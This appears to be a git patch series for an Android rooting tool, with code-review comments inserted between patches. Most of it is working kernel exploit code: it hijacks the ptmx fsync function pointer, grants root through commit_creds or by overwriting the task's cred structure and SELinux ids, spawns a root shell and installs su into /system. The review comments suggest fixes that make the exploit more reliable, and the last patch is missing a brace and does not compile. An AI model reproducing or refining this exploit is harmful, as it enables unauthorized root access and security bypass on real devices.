*/ -}; - -struct list_head { - struct list_head *next; - struct list_head *prev; -}; - -struct task_security_struct { - unsigned long osid; - unsigned long sid; - unsigned long exec_sid; - unsigned long create_sid; - unsigned long keycreate_sid; - unsigned long sockcreate_sid; -}; - - -struct task_struct_partial { - struct list_head cpu_timers[3]; - struct cred *real_cred; - struct cred *cred; - struct cred *replacement_session_keyring; - char comm[16]; -}; - -static inline struct thread_info * -current_thread_info(void) -{ - register unsigned long sp asm ("sp"); - return (struct thread_info *)(sp & ~(THREAD_SIZE - 1)); -} - -static bool -is_cpu_timer_valid(struct list_head *cpu_timer) -{ - if (cpu_timer->next != cpu_timer->prev) { - return false; - } - - if ((unsigned long int)cpu_timer->next < KERNEL_START) { - return false; - } - - return true; -} - -static void -obtain_root_privilege_by_modify_task_cred(void) -{ - struct thread_info *info; - struct cred *cred; - struct task_security_struct *security; - int i; - - info = current_thread_info(); - cred = NULL; - - for (i = 0; i < 0x400; i+= 4) { - struct task_struct_partial *task = ((void *)info->task) + i; - - if (is_cpu_timer_valid(&task->cpu_timers[0]) - && is_cpu_timer_valid(&task->cpu_timers[1]) - && is_cpu_timer_valid(&task->cpu_timers[2]) - && task->real_cred == task->cred) { - cred = task->cred; - break; - } - } - - if (cred == NULL) { - return; - } - - cred->uid = 0; - cred->gid = 0; - cred->suid = 0; - cred->sgid = 0; - cred->euid = 0; - cred->egid = 0; - cred->fsuid = 0; - cred->fsgid = 0; - - cred->cap_inheritable.cap[0] = 0xffffffff; - cred->cap_inheritable.cap[1] = 0xffffffff; - cred->cap_permitted.cap[0] = 0xffffffff; - cred->cap_permitted.cap[1] = 0xffffffff; - cred->cap_effective.cap[0] = 0xffffffff; - cred->cap_effective.cap[1] = 0xffffffff; - cred->cap_bset.cap[0] = 0xffffffff; - cred->cap_bset.cap[1] = 0xffffffff; - - security = cred->security; - if (security) { - if (security->osid != 0 - && 
security->sid != 0 - && security->exec_sid == 0 - && security->create_sid == 0 - && security->keycreate_sid == 0 - && security->sockcreate_sid == 0) { - security->osid = 1; - security->sid = 1; - } - } -} - -static void -obtain_root_privilege_by_commit_creds(void) -{ - commit_creds(prepare_kernel_cred(0)); -} - -static void (*obtain_root_privilege_func)(void); - -void -obtain_root_privilege(void) -{ - if (obtain_root_privilege_func) { - obtain_root_privilege_func(); - } -} - -static bool -run_obtain_root_privilege(void *user_data) -{ - int fd; - int ret; - - obtain_root_privilege_func = obtain_root_privilege_by_commit_creds; - - fd = open(PTMX_DEVICE, O_WRONLY); - - ret = fsync(fd); - - if (getuid() != 0) { - printf("commit_creds(): failed. Try to hack task->cred.\n"); - - obtain_root_privilege_func = obtain_root_privilege_by_modify_task_cred; - ret = fsync(fd); - } - - close(fd); - - return (ret == 0); -} - -static bool -run_exploit(void) -{ - setup_ptmx_fops_fsync_address(); - if (!ptmx_fops_fsync_address) { - return false; - } - - return attempt_exploit(ptmx_fops_fsync_address, - (unsigned long int)&obtain_root_privilege, 0, - run_obtain_root_privilege, NULL); -} - -static bool -find_ptmx_fops_address(kallsyms *info, void *mem, size_t length) -{ - find_ptmx_fops_hint_t hint; - - hint.ptmx_open_address = kallsyms_in_memory_lookup_name(info, "ptmx_open"); - if (!hint.ptmx_open_address) { - return false; - } - - hint.tty_release_address = kallsyms_in_memory_lookup_name(info, "tty_release"); - if (!hint.tty_release_address) { - return false; - } - - hint.tty_fasync_address = kallsyms_in_memory_lookup_name(info, "tty_fasync"); - if (!hint.tty_fasync_address) { - return false; - } - - return setup_ptmx_fops_address_in_memory(mem, length, &hint); -} - -bool find_variables_in_memory(void *mem, size_t length) -{ - kallsyms *info; - - printf("Search address in memroy...\n"); - - info = kallsyms_in_memory_init(mem, length); - if (info) { - printf("Using 
kallsyms_in_memroy...\n"); - - if (!prepare_kernel_cred) { - prepare_kernel_cred = (prepare_kernel_cred_t)kallsyms_in_memory_lookup_name(info, "prepare_kernel_cred"); - } - - if (!commit_creds) { - commit_creds = (commit_creds_t)kallsyms_in_memory_lookup_name(info, "commit_creds"); - } - - if (!ptmx_fops) { - ptmx_fops = (void *)kallsyms_in_memory_lookup_name(info, "ptmx_fops"); - - if (!ptmx_fops) { - find_ptmx_fops_address(info, mem, length); - } - } - - kallsyms_in_memory_free(info); - - if (prepare_kernel_cred && commit_creds && ptmx_fops) { - return true; - } - } - - setup_prepare_kernel_cred_address_in_memory(mem, length); - setup_commit_creds_address_in_memory(mem, length); - - return prepare_kernel_cred && commit_creds && ptmx_fops; -} - -bool -setup_variables(void) -{ - setup_prepare_kernel_cred_address(); - setup_commit_creds_address(); - setup_ptmx_fops_address(); - - if (prepare_kernel_cred && commit_creds && ptmx_fops) { - return true; - } - - printf("Try to find address in memory...\n"); - if (!run_with_mmap(find_variables_in_memory)) { - printf("\n"); - run_with_memcpy(find_variables_in_memory); - } - - if (prepare_kernel_cred && commit_creds && ptmx_fops) { - printf(" prepare_kernel_cred = %p\n", prepare_kernel_cred); - printf(" commit_creds = %p\n", commit_creds); - printf(" ptmx_fops = %p\n", ptmx_fops); - -#ifdef HAS_SET_SYMBOL_ADDRESS - device_set_symbol_address(DEVICE_SYMBOL(prepare_kernel_cred), (unsigned long int)prepare_kernel_cred); - device_set_symbol_address(DEVICE_SYMBOL(commit_creds), (unsigned long int)commit_creds); - device_set_symbol_address(DEVICE_SYMBOL(ptmx_fops), (unsigned long int)ptmx_fops); -#endif /* HAS_SET_SYMBOL_ADDRESS */ - - return true; - } - - if (!prepare_kernel_cred) { - printf("Failed to get prepare_kernel_cred address.\n"); - } - - if (!commit_creds) { - printf("Failed to get commit_creds address.\n"); - } - - if (!ptmx_fops) { - printf("Failed to get ptmx_fops address.\n"); - } - - 
print_reason_device_not_supported(); - - return false; -} - -int -get_root(int argc, char **argv) -{ - char* command = NULL; - int i; - for (i = 1; i < argc; i++) { - if (!strcmp(argv[i], "-c")) { - if (++i < argc) { - command = argv[i]; - } - } - } - - device_detected(); - - if (!setup_variables()) { - printf("Failed to setup variables.\n"); - exit(EXIT_FAILURE); - } - - run_exploit(); - - if (getuid() != 0) { - printf("Failed to obtain root privilege.\n"); - exit(EXIT_FAILURE); - } - - if (command == NULL) { - system("/system/bin/sh"); - } else { - execl("/system/bin/sh", "/system/bin/sh", "-c", command, NULL); - } - - if ((fopen("/data/local/tmp/su", "r")) != NULL){ - system("mount -o rw,remount /system"); - system("cp /data/local/tmp/su /system/xbin"); - system("chmod 644 /system/xbin/su"); - system("mount -o ro,remount /system"); - } - - exit(EXIT_SUCCESS); -} -/* -vi:ts=2:nowrap:ai:expandtab:sw=2 -*/ diff --git a/main.c b/main.c index 2734be1..b4b09ad 100644 --- a/main.c +++ b/main.c 
@@ -17,37 +17,383 @@ #include "ptmx.h" #include "libexploit/exploit.h" #include "libkallsyms/kallsyms_in_memory.h" -#include -static int print_help(const char* cmd) { - printf("Usage\n"); - printf("> Try privilege escalation:\n"); - printf("%s get_root\n", cmd); - printf("\n"); - printf("> Get symbol address:\n"); - printf("%s get_address\n", cmd); - return 1; +#define THREAD_SIZE 8192 + +#define KERNEL_START 0xc0000000 + +struct thread_info; +struct task_struct; +struct cred; +struct kernel_cap_struct; +struct task_security_struct; +struct list_head; + +struct thread_info { + unsigned long flags; + int preempt_count; + unsigned long addr_limit; + struct task_struct *task; + + /* ... */ +}; + +struct kernel_cap_struct { + unsigned long cap[2]; +}; + +struct cred { + unsigned long usage; + uid_t uid; + gid_t gid; + uid_t suid; + gid_t sgid; + uid_t euid; + gid_t egid; + uid_t fsuid; + gid_t fsgid; + unsigned long securebits; + struct kernel_cap_struct cap_inheritable; + struct kernel_cap_struct cap_permitted; + struct kernel_cap_struct cap_effective; + struct kernel_cap_struct cap_bset; + unsigned char jit_keyring; + void *thread_keyring; + void *request_key_auth; + void *tgcred; + struct task_security_struct *security; + + /* ... 
*/ +}; + +struct list_head { + struct list_head *next; + struct list_head *prev; +}; + +struct task_security_struct { + unsigned long osid; + unsigned long sid; + unsigned long exec_sid; + unsigned long create_sid; + unsigned long keycreate_sid; + unsigned long sockcreate_sid; +}; + + +struct task_struct_partial { + struct list_head cpu_timers[3]; + struct cred *real_cred; + struct cred *cred; + struct cred *replacement_session_keyring; + char comm[16]; +}; + +static inline struct thread_info * +current_thread_info(void) +{ + register unsigned long sp asm ("sp"); + return (struct thread_info *)(sp & ~(THREAD_SIZE - 1)); +} + +static bool +is_cpu_timer_valid(struct list_head *cpu_timer) +{ + if (cpu_timer->next != cpu_timer->prev) { + return false; + } + + if ((unsigned long int)cpu_timer->next < KERNEL_START) { + return false; + } + + return true; +} + +static void +obtain_root_privilege_by_modify_task_cred(void) +{ + struct thread_info *info; + struct cred *cred; + struct task_security_struct *security; + int i; + + info = current_thread_info(); + cred = NULL; + + for (i = 0; i < 0x400; i+= 4) { + struct task_struct_partial *task = ((void *)info->task) + i; + + if (is_cpu_timer_valid(&task->cpu_timers[0]) + && is_cpu_timer_valid(&task->cpu_timers[1]) + && is_cpu_timer_valid(&task->cpu_timers[2]) + && task->real_cred == task->cred) { + cred = task->cred; + break; + } + } + + if (cred == NULL) { + return; + } + + cred->uid = 0; + cred->gid = 0; + cred->suid = 0; + cred->sgid = 0; + cred->euid = 0; + cred->egid = 0; + cred->fsuid = 0; + cred->fsgid = 0; + + cred->cap_inheritable.cap[0] = 0xffffffff; + cred->cap_inheritable.cap[1] = 0xffffffff; + cred->cap_permitted.cap[0] = 0xffffffff; + cred->cap_permitted.cap[1] = 0xffffffff; + cred->cap_effective.cap[0] = 0xffffffff; + cred->cap_effective.cap[1] = 0xffffffff; + cred->cap_bset.cap[0] = 0xffffffff; + cred->cap_bset.cap[1] = 0xffffffff; + + security = cred->security; + if (security) { + if (security->osid != 0 + && 
security->sid != 0 + && security->exec_sid == 0 + && security->create_sid == 0 + && security->keycreate_sid == 0 + && security->sockcreate_sid == 0) { + security->osid = 1; + security->sid = 1; + } + } +} + +static void +obtain_root_privilege_by_commit_creds(void) +{ + commit_creds(prepare_kernel_cred(0)); +} + +static void (*obtain_root_privilege_func)(void); + +void +obtain_root_privilege(void) +{ + if (obtain_root_privilege_func) { + obtain_root_privilege_func(); + } +} + +static bool +run_obtain_root_privilege(void *user_data) +{ + int fd; + int ret; + + obtain_root_privilege_func = obtain_root_privilege_by_commit_creds; + + fd = open(PTMX_DEVICE, O_WRONLY); + + ret = fsync(fd); + + if (getuid() != 0) { + printf("commit_creds(): failed. Try to hack task->cred.\n"); + + obtain_root_privilege_func = obtain_root_privilege_by_modify_task_cred; + ret = fsync(fd); + } + + close(fd); + + return (ret == 0); +} + +static bool +run_exploit(void) +{ + setup_ptmx_fops_fsync_address(); + if (!ptmx_fops_fsync_address) { + return false; + } + + return attempt_exploit(ptmx_fops_fsync_address, + (unsigned long int)&obtain_root_privilege, 0, + run_obtain_root_privilege, NULL); } void -device_detected(void) { +device_detected(void) +{ char device[PROP_VALUE_MAX]; char build_id[PROP_VALUE_MAX]; - + __system_property_get("ro.product.model", device); __system_property_get("ro.build.display.id", build_id); - + printf("\n\nDevice detected: %s (%s)\n\n", device, build_id); - return; } -int main(int argc, char **argv) { +static bool +find_ptmx_fops_address(kallsyms *info, void *mem, size_t length) +{ + find_ptmx_fops_hint_t hint; + + hint.ptmx_open_address = kallsyms_in_memory_lookup_name(info, "ptmx_open"); + if (!hint.ptmx_open_address) { + return false; + } + + hint.tty_release_address = kallsyms_in_memory_lookup_name(info, "tty_release"); + if (!hint.tty_release_address) { + return false; + } + + hint.tty_fasync_address = kallsyms_in_memory_lookup_name(info, "tty_fasync"); + if 
(!hint.tty_fasync_address) { + return false; + } + + return setup_ptmx_fops_address_in_memory(mem, length, &hint); +} + +bool find_variables_in_memory(void *mem, size_t length) +{ + kallsyms *info; + + printf("Search address in memroy...\n"); + + info = kallsyms_in_memory_init(mem, length); + if (info) { + printf("Using kallsyms_in_memroy...\n"); + + if (!prepare_kernel_cred) { + prepare_kernel_cred = (prepare_kernel_cred_t)kallsyms_in_memory_lookup_name(info, "prepare_kernel_cred"); + } + + if (!commit_creds) { + commit_creds = (commit_creds_t)kallsyms_in_memory_lookup_name(info, "commit_creds"); + } + + if (!ptmx_fops) { + ptmx_fops = (void *)kallsyms_in_memory_lookup_name(info, "ptmx_fops"); + + if (!ptmx_fops) { + find_ptmx_fops_address(info, mem, length); + } + } + + kallsyms_in_memory_free(info); + + if (prepare_kernel_cred && commit_creds && ptmx_fops) { + return true; + } + } + + setup_prepare_kernel_cred_address_in_memory(mem, length); + setup_commit_creds_address_in_memory(mem, length); + + return prepare_kernel_cred && commit_creds && ptmx_fops; +} - if (argc == 2 && strcmp(argv[1], "get_root") == 0) { - return get_root(); - } else if (argc == 2 && strcmp(argv[1], "get_address") == 0) { - return get_address(); +bool +try_get_symbol(void) +{ + if (get_address()) { + return true; } + + print_reason_device_not_supported(); - return print_help(argv[0]); + return false; +} + +bool +setup_variables(void) +{ + setup_prepare_kernel_cred_address(); + setup_commit_creds_address(); + setup_ptmx_fops_address(); + + if (prepare_kernel_cred && commit_creds && ptmx_fops) { + return true; + } + + printf("Try to find address in memory...\n"); + if (!run_with_mmap(find_variables_in_memory)) { + printf("\n"); + run_with_memcpy(find_variables_in_memory); + } + + if (prepare_kernel_cred && commit_creds && ptmx_fops) { + printf(" prepare_kernel_cred = %p\n", prepare_kernel_cred); + printf(" commit_creds = %p\n", commit_creds); + printf(" ptmx_fops = %p\n", ptmx_fops); + 
+#ifdef HAS_SET_SYMBOL_ADDRESS + device_set_symbol_address(DEVICE_SYMBOL(prepare_kernel_cred), (unsigned long int)prepare_kernel_cred); + device_set_symbol_address(DEVICE_SYMBOL(commit_creds), (unsigned long int)commit_creds); + device_set_symbol_address(DEVICE_SYMBOL(ptmx_fops), (unsigned long int)ptmx_fops); +#endif /* HAS_SET_SYMBOL_ADDRESS */ + + return true; + } + + if (!prepare_kernel_cred) { + printf("Failed to get prepare_kernel_cred address.\n"); + } + + if (!commit_creds) { + printf("Failed to get commit_creds address.\n"); + } + + if (!ptmx_fops) { + printf("Failed to get ptmx_fops address.\n"); + } + + if (try_get_symbol()) { + printf("This device information has been added to the database!\n"); + printf("Please to retry.\n"); + } + + return false; +} + +int +main(int argc, char **argv) +{ + char* command = NULL; + int i; + for (i = 1; i < argc; i++) { + if (!strcmp(argv[i], "-c")) { + if (++i < argc) { + command = argv[i]; + } + } + } + + device_detected(); + + if (!setup_variables()) { + printf("Failed to setup variables.\n"); + exit(EXIT_FAILURE); + } + + run_exploit(); + + if (getuid() != 0) { + printf("Failed to obtain root privilege.\n"); + exit(EXIT_FAILURE); + } + + if (command == NULL) { + system("/system/bin/sh"); + } else { + execl("/system/bin/sh", "/system/bin/sh", "-c", command, NULL); + } + + exit(EXIT_SUCCESS); } +/* + vi:ts=2:nowrap:ai:expandtab:sw=2 + */ \ No newline at end of file From 999e6799c035f97f8bb32d8998264e55f0fe952d Mon Sep 17 00:00:00 2001 From: scoty755 Date: Fri, 16 Oct 2015 00:53:59 +0900 Subject: [PATCH 25/26] Revert "updated readme" --- README.md | 6 +----- 1 file changed, 1 insertion(+), 5 deletions(-) diff --git a/README.md b/README.md index 8564aa1..0463a05 100644 --- a/README.md +++ b/README.md 
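Review bot: `run_obtain_root_privilege()` never checks the descriptor returned by `open(PTMX_DEVICE, O_WRONLY)`; when the open fails, `fsync(-1)` just returns -1 with EBADF, `close(-1)` is called, and the function returns false without any message, so a missing or unreadable ptmx device is indistinguishable from the exploit itself failing. Add `if (fd < 0) { perror(PTMX_DEVICE); return false; }` directly after the open. In `main()`, a failed `execl()` returns -1 and falls through to `exit(EXIT_SUCCESS)`, so a `-c` invocation can report success without the command ever running; follow the execl with `perror("execl"); exit(EXIT_FAILURE);`, and pass the variadic terminator as `(char *)NULL` rather than bare `NULL` for portability. The argument loop also silently ignores a trailing `-c` with no value, which deserves at least a usage message.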
@@ -47,8 +47,4 @@ Running `adb shell chmod 777 /data/local/tmp/*`
 * Run the command on the phone:
- If the device is not listed in the database, you will need to run this command at the beginning
- `adb shell /data/local/tmp/run_root_shell get_address`
-
- If you try to privilege escalation, you must run this command
- `adb shell /data/local/tmp/run_root_shell get_root`
+ `adb shell /data/local/tmp/run_root_shell`
From 7456c4b2655817ee3182129e34d0ad810d47a02d Mon Sep 17 00:00:00 2001
From: scoty755
Date: Fri, 18 Dec 2015 00:08:08 +0900
Subject: [PATCH 26/26] Change the setup process
---
 main.c | 24 ++++++++++++++++++------
 1 file changed, 18 insertions(+), 6 deletions(-)
diff --git a/main.c b/main.c
index 4fa0d5c..fb8bd63 100644
--- a/main.c
+++ b/main.c
@@ -354,16 +354,28 @@ setup_variables(void)
 printf("Failed to get ptmx_fops address.\n");
 }
- if (try_get_symbol()) {
- printf("This device information has been added to the database!\n");
- printf("Please to retry.\n");
- }
-
 print_reason_device_not_supported();
 return false;
 }
+bool
+try_lookup_symbol(void)
+
+if (setup_variables()) {
+ return true;
+}
+
+
+if (try_get_symbol()) {
+ printf("This device information has been added to the database!\n");
+ return true;
+}
+
+ return false;
+
+}
+
 int
 main(int argc, char **argv)
 {
@@ -379,7 +391,7 @@ main(int argc, char **argv)
 device_detected();
- if (!setup_variables()) {
+ if (!try_lookup_symbol()) {
 printf("Failed to setup variables.\n");
 exit(EXIT_FAILURE);
 }
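Review bot: The new `try_lookup_symbol()` is missing the opening brace of its body — the hunk goes from `+try_lookup_symbol(void)` straight to `+if (setup_variables()) {` — so this commit does not compile; the definition needs `try_lookup_symbol(void)` followed by `{` on its own line, and the two `if` blocks should be indented to match the rest of the file. Separately, the removed code printed `Please to retry.` and fell through to `return false` after `try_get_symbol()` succeeded, whereas the new function returns true; unless `get_address()` also fills `prepare_kernel_cred`, `commit_creds` and `ptmx_fops` in the running process (not visible here), the second hunk's `if (!try_lookup_symbol())` lets `main()` continue into `run_exploit()` with those pointers unset, so keeping the retry message and `return false;` looks safer. If `try_get_symbol()` is still as defined in the earlier patch, both it and `setup_variables()` call `print_reason_device_not_supported()` on failure, so an unsupported device now gets that message twice — consider dropping the call from `setup_variables()` now that `try_lookup_symbol()` wraps it.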